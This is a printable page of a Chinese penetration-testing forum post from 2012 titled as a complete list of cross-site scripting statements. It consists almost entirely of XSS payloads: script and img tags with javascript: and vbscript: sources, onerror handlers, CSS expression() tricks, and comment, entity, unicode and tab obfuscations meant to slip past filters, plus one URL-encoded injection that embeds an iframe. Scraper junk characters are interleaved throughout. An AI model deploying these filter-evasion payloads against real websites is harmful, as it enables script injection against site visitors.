中国网络渗透测试联盟

标题: 跨站语句大全 [打印本页]
作者: admin    时间: 2012-9-13 17:15
标题: 跨站语句大全
<script>alert("跨站")</script>    (最常用)
1 l& R9 H" M7 x7 C4 V0 E/ h$ i) h& A: X<img scr=javascript:alert("跨站")></img>
( d# B4 L7 m3 E2 X<img scr="javascrip&#116&#58 alert(/跨站/)></img>
) D0 U" I7 h7 U: {1 V6 z  y<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格): M: s; ?  R4 ^5 Y# B' W
<img scr="#" onerror=alert(/跨站/)></img>- `8 M/ h0 b2 l  d
<img scr="#" style="xss:expression(alert(/xss/));"></img>, G) {$ [7 b8 e: o2 K: g
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)5 n3 [5 L, w- \
<img src=vbscript:msgbox ("xss")></img>
6 `+ E7 t. v: K0 L<style> input {left:expression (alert('xss'))}</style>
# w/ j+ p6 P( W3 y' M7 f( p<div style={left:expression (alert('xss'))}></div>& }8 Y* E3 q6 d+ ^6 h9 d( M
<div style={left:exp/* */ression (alert('xss'))}></div>
  |0 z! y7 |5 Z" u& ?4 I1 q<div style={left:\0065\0078ression (alert('xss'))}></div>
6 E4 T# y4 r+ }html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>( T: U4 j; h! q4 x. e1 z
unicode <div style="{left:expRessioN (alert('xss'))}">1 h* G9 ?4 ?2 c1 ^7 G6 E& [
6 B, x# t, u. b4 t: W, k
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>[": R9 N7 Z) I. a




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2